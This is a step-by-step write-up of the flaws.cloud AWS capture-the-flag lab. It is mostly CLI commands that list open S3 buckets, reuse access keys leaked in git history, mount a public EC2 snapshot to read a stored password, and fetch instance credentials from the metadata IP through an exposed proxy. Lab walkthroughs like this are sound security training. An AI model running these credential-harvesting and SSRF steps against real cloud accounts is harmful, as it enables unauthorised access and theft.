flaws.cloud

Level 1

URL

Flaw: Permission Misconfiguration: Anyone could list the bucket content.

List the bucket contents for flaws.cloud

aws s3 ls s3://flaws.cloud --no-sign-request

Get the html file

aws s3 cp s3://flaws.cloud/secret-dd02c7c.html . --no-sign-request

Level 2

URL

AWS ACCOUNT AND CLI CONFIGURATION NEEDED !!!

Configure AWS CLI with Access Key ID and Secret Access Key

$ aws configure --profile YOUR_PROFILE                            
AWS Access Key ID [********************]: 
AWS Secret Access Key [********************]: 
Default region name [ap-south-1]: 
Default output format [text]:

Flaw: Any authenticated AWS user could list the bucket contents

List the bucket contents for the url using AWS account

aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud --profile YOUR_PROFILE

Get the secret html file

aws s3 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html . --profile YOUR_PROFILE

Level 3

URL

Flaw: Bucket listing permissions for everyone and leaked access keys in git commits

List the bucket contents for the url using AWS profile

aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --profile YOUR_PROFILE

Download the .git folder

aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git l3-dump  --profile YOUR_PROFILE

Check the git logs
```
git log
```
Check the first commit
```
git checkout {commit hash}
```
Check the commit contents
```
git show
```
Create a profile using the credentials
```
aws configure --profile flaws-l3
```
- Enter AKIA and Secret access Key from the git commit
List all the buckets for the newly created profile
```
aws s3 ls --profile flaws-l3
```

Level 4

URL ec2 url

Flaw: Snapshot of EC2 instance made public

Use nslookup and get the region of the snapshot
- nslookup 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud
- Region: us-west-2
Using the flaws-l3 profile look for ec2 snapshots
```
aws ec2 describe-snapshots --profile flaws-l3
```

Get account id for the flaws-l3 keys

aws --profile flaws sts get-caller-identity

List the ec2 snapshots for the particular owner

aws ec2 describe-snapshots --profile flaws-l3 --owner-id {owner-id} --region us-west-2

Mount the volume using the snapshot id to your acc

aws --profile {YOUR_ACCOUNT} ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

Create an ec2 instance in the us-west-2 region
Attach the snapshot as an extra volume
Connect to the ec2 instance using ssh with the keypair while setting up the ec2
```
ssh -i "flaws4.pem" ubuntu@ec2-35-85-61-84.us-west-2.compute.amazonaws.com
```
Mount the volume
- sudo file -s /dev/xvdf1
- sudo mount /dev/xvdf1 /mnt
Look around in the snapshot
- We get credentials in /home/ubuntu/setupNginx.sh
  - flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
Enter the credentials here
Terminate the EC2 instance

Level 5

URL

Flaw: exposed proxy which doesn't restrict access to instance's meta-data server and private IP range

The IP address 169.254.169.254 is a magic IP in the cloud world. AWS, Azure, Google, DigitalOcean and others use this to allow cloud resources to find out metadata about themselves.

Each EC2 instance has metadata available on a magic private (only itself can access) IP address 169.254.169.254. The juiciest part of this metadata, are the credentials for the Instance Profile (if one is set), which can be retrieved through a web request to http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/.

Get the meta-data listing

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

We get credentials at this url

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

Configure using the keys
```
aws configure --profile flaws-l5```
```
Add the Access Key ID, Secret Access key and Session token to /.aws/credentials

List the contents of the level6 bucket

aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile flaws-l5

Level 6

URL

**Flaw: Extra permissions given to policies **

Create a profile using the provided credentials
```
aws configure --profile flaws-l6
```
Get other info about the profile
```
aws --profile flaws-l6 iam get-user
```

List the IAM policies attached to the user

aws --profile flaws-l6 iam list-attached-user-policies --user-name Level6

Get more info on the policy list_apigateways

aws --profile flaws-l6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

Get the version of the policy

aws --profile flaws-l6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4

The policy tells us we can GET on the resource arn:aws:apigateway:us-west-2::/restapis/*
Enumerating the other policy MySecurityAudit, it lets us see some things about lambdas.

List the lambda functions

aws --profile flaws-l6 --region us-west-2 lambda list-functions

Get policy for the function

aws --profile flaws-l6 --region us-west-2 lambda get-policy --function-name Level6

Use the API ID: s33ppypa75 and get the stage

aws --profile flaws-l6 --region us-west-2 apigateway get-stages --rest-api-id s33ppypa75

That tells you the stage name is "Prod". Lambda functions are called using that rest-api-id, stage name, region, and resource as
- Format: https://<API-id>.execute-api.<region>.amazonaws.com/<stage-name>/<resource>
  - API-id: s33ppypa75
  - Region: us-west-2
  - Stage: Prod
  - Resource: level6
- URL : https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
- On visting the url it displays another URL which is the final URL

 _____  _       ____  __    __  _____
|     || |     /    ||  |__|  |/ ___/
|   __|| |    |  o  ||  |  |  (   \_ 
|  |_  | |___ |     ||  |  |  |\__  |
|   _] |     ||  _  ||  `  '  |/  \ |
|  |   |     ||  |  | \      / \    |
|__|   |_____||__|__|  \_/\_/   \___|
		flAWS - The End

Last updated 1 year ago